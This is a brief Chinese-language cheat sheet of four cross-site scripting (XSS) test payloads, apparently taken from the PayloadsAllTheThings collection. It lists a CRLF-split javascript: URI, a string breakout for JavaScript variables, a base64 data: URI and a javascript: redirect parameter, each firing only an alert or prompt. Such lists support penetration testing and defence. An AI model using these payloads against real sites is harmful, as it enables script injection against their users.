杂七杂八的安全tips

XSS TIPS

Ref:PayloadsAllTheThings

  1. 使用CRLF: (CR:\r,0x0d;LF:\n,0x0a)
    java%0d%0ascript%0d%0a:alert(0)
    
  2. XSS from Open URL - If it’s in a JS variable
    ";alert(0);//
    
  3. XSS from data:// wrapper
    http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
    
  4. XSS from javascript:// wrapper
    http://www.example.com/redirect.php?url=javascript:prompt(1)